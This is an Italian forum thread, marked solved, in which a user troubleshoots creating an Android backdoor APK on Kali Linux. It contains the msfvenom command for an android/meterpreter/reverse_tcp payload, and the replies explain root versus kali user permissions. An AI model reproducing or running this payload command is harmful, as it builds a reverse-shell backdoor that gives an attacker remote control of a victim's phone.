Domanda Risolto Problema con backdoor apk su kali linux

Stato
Discussione chiusa ad ulteriori risposte.

Persi

Utente Iron
15 Marzo 2022
11
3
3
8
Buongiorno a tutti sono nuovo e ho un problema con kali linux quando cerco di creare una backdoor apk: dopo aver ottenuto i permessi root con -su e aver aperto mfsconsole digito il seguente comando come ho visto da una guida su questo forum:

msfvenom android/meterpreter/reverse_tcp LHOST=********** LPORT=4444 R > /root/backdoor.apk
--------------------------------------------------------------
quando avvio:
---------------------------------------------------------
[-] No platform was selected, choosing Msf::Module: :platform::Android from the payload
[-] No arch selected, selecting arch: dalvik from the payload
E mi da un messaggio con la dimensione del payload
A questo punto ho letto che dovrei trovare sulla home di kali il file .apk ma non trovo nulla.
Ho provato anche a sostituire il comando R> con -f ma dopo aver eseguito il comando mi dice che il formato apk non è presente nella lista dei formati possibili.
Cosa sto sbagliando?
 
Non lo trovi sulla home di kali perchè hai messo come path "/root/backdoor.apk", quindi lo troverai nella directory /root ...
 
Ultima modifica:
Non lo trovi sulla home di kali perchè hai messo come path "/root/backdoor.apk", quindi lo troverai nella directory /root ...
Ok grazie mille, appena arrivo a casa controllo!
Messaggio unito automaticamente:

Non lo trovi sulla home di kali perchè hai messo come path "/root/backdoor.apk", quindi lo troverai nella directory /root ...
Ciao ho controllato e da terminale con il comando ls vedo i file. Ma non riesco a vederli nelle cartelle.
 
Ho risolto creando l'apk nella cartella bin. Non riuscivo a vedere il contenuto della cartella root, o meglio, riesco a vederlo solo da terminale con il comando ls
 
Ho risolto creando l'apk nella cartella bin. Non riuscivo a vedere il contenuto della cartella root, o meglio, riesco a vederlo solo da terminale con il comando ls
È normale, "root" e "Kali" sono due utenti diversi, root ha privilegi elevati, mentre Kali no. Il contenuto della directory /root non può essere visito da altri utenti, ecco perché tramite gui non vedi nulla (perché quando fai il login tu sei "Kali"). Quando digiti su stai dicendo "Switch user" to root, quindi sostanzialmente stai cambiando utente
 
  • Mi piace
Reazioni: --- Ra ---
È normale, "root" e "Kali" sono due utenti diversi, root ha privilegi elevati, mentre Kali no. Il contenuto della directory /root non può essere visito da altri utenti, ecco perché tramite gui non vedi nulla (perché quando fai il login tu sei "Kali"). Quando digiti su stai dicendo "Switch user" to root, quindi sostanzialmente stai cambiando utente
Capisco. Non esiste comunque un modo per aggiungere in maniera definitiva un utente low al gruppo root? Comunque grazie per le risposte!
 
Capisco. Non esiste comunque un modo per aggiungere in maniera definitiva un utente low al gruppo root? Comunque grazie per le risposte!
Sni, puoi mattere l'utente all'interno dei sudoers. Offsec ha creato apposta l'utente kali perchè è una pessima idea far loggare le persone come utenti root.
Comunque basta non eseguire il comando "su" ed eseguire direttamente msfvenom bla bla all'interno della home utente, non serve avere privilegi elevati per generare un file
 
Stato
Discussione chiusa ad ulteriori risposte.